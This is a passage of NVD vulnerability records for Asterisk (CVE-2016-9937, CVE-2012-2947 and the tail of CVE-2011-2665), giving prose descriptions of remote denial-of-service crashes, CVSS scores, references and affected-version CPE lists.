              "url": "http://www.debian.org/security/2011/dsa-2276"
            },
            {
              "name": "FEDORA-2011-8914",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff"
            },
            {
              "name": "45048",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45048"
            },
            {
              "name": "45201",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45201"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-2665",
    "datePublished": "2011-07-06T19:00:00",
    "dateReserved": "2011-07-06T00:00:00",
    "dateUpdated": "2024-08-06T23:08:23.768Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Vulnerability from fkie_nvd

Published

2016-12-12 21:59

Modified

2024-11-21 03:02

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in Asterisk Open Source 13.12.x and 13.13.x before 13.13.1 and 14.x before 14.2.1. If an SDP offer or answer is received with the Opus codec and with the format parameters separated using a space the code responsible for parsing will recursively call itself until it crashes. This occurs as the code does not properly handle spaces separating the parameters. This does NOT require the endpoint to have Opus configured in Asterisk. This also does not require the endpoint to be authenticated. If guest is enabled for chan_sip or anonymous in chan_pjsip an SDP offer or answer is still processed and the crash occurs.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff	Patch, Vendor Advisory
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff	Patch, Vendor Advisory
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2016-008.html	Patch, Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/94792	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1037407
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-26579	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2016-008.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/94792	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1037407
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-26579	Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	13.12
digium	asterisk	13.13
digium	asterisk	14.0
digium	asterisk	14.1
digium	asterisk	14.01
digium	asterisk	14.1.1
digium	asterisk	14.1.2
digium	asterisk	14.02
digium	asterisk	14.2

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A96EB57-835A-45B4-82F5-31F925A85629",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "86B16D04-3808-4380-8F64-0C36B185C1F2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C949D5F5-6C0B-4B17-85B6-3A77D08CF967",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C039C0CE-9C9C-4D85-8D7C-574DCF9D920B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "A1B2F2CC-18C3-46E7-8E7F-970622A710C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D2C4DA60-5701-4BD0-B2F9-D93B9E64111F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B12834D-2AF1-4AD1-AB23-859CAA5D3210",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "89036D04-EA04-4041-9694-6768478D35F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B19070D3-9F03-43C7-9F31-9A54BD5F2441",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk Open Source 13.12.x and 13.13.x before 13.13.1 and 14.x before 14.2.1. If an SDP offer or answer is received with the Opus codec and with the format parameters separated using a space the code responsible for parsing will recursively call itself until it crashes. This occurs as the code does not properly handle spaces separating the parameters. This does NOT require the endpoint to have Opus configured in Asterisk. This also does not require the endpoint to be authenticated. If guest is enabled for chan_sip or anonymous in chan_pjsip an SDP offer or answer is still processed and the crash occurs."
    },
    {
      "lang": "es",
      "value": "Se descubri\u00f3 un problema en Asterisk Open Source 13.12.x y 13.13.x en versiones anteriores 13.13.1 y 14.x en versiones anteriores 14.2.1. Si se recibe una prueba o respuesta SDP con el codec Opus y con los par\u00e1metros de formato separados usando un espacio de c\u00f3digo responsable de an\u00e1lisis llamar\u00e1 a si mismo de forma recursiva hasta que se bloquee. Esto ocurre cuando el c\u00f3digo no maneja adecuadamente los espacios que separan los par\u00e1metros. Esto NO requiere que el punto final tenga Opus configurado en Asterisk. Esto tampoco requiere que el punto final est\u00e9 autenticado. Si el invitado est\u00e1 habilitado para chan_sip o an\u00f3nimo en chan_pjsip una prueba o respuesta SDP se sigue procesando y se produce el bloqueo."
    }
  ],
  "id": "CVE-2016-9937",
  "lastModified": "2024-11-21T03:02:02.660",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": true,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2016-12-12T21:59:00.303",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-008.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/94792"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1037407"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26579"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-13.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-008-14.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/94792"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1037407"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-26579"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2012-06-02 15:55

Modified

2024-11-21 01:40

Severity ?

Summary

chan_iax2.c in the IAX2 channel driver in Certified Asterisk 1.8.11-cert before 1.8.11-cert2 and Asterisk Open Source 1.8.x before 1.8.12.1 and 10.x before 10.4.1, when a certain mohinterpret setting is enabled, allows remote attackers to cause a denial of service (daemon crash) by placing a call on hold.

References

URL	Tags
cve@mitre.org	http://archives.neohapsis.com/archives/bugtraq/2012-05/0144.html	Broken Link
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2012-007.html	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/49303	Not Applicable
cve@mitre.org	http://www.debian.org/security/2012/dsa-2493	Third Party Advisory
cve@mitre.org	http://www.securitytracker.com/id?1027102	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/bugtraq/2012-05/0144.html	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2012-007.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/49303	Not Applicable
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2012/dsa-2493	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1027102	Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
debian	debian_linux	6.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.0
digium	asterisk	10.0.1
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.0
digium	asterisk	10.1.1
digium	asterisk	10.1.2
digium	asterisk	10.1.3
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.0
digium	asterisk	10.2.1
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.0
digium	asterisk	10.3.1
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	asterisk	10.4.0
digium	certified_asterisk	1.8.11
digium	certified_asterisk	1.8.11

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "036E8A89-7A16-411F-9D31-676313BB7244",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
